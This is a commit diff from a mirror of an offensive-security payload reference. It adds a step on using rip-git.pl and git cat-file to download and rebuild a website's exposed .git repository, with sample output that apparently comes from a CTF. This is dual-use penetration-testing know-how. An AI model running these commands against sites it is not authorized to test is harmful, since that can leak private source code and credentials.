mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Update Git-rip
This commit is contained in:
parent
6b860c627e
commit
b0769b19b0
1 changed files with 16 additions and 0 deletions
|
@ -21,6 +21,22 @@ bloorq@gmail.com <bloorq@gmail.com> 1452195279 +0000 commit (initial): index.
|
|||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
5. Alternative way : rip-git
|
||||
```
|
||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
||||
|
||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489389105 +0000
|
||||
committer Michael <michael@easyctf.com> 1489389105 +0000
|
||||
|
||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
# SVN - Source management
|
||||
SVN example (Wordpress)
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue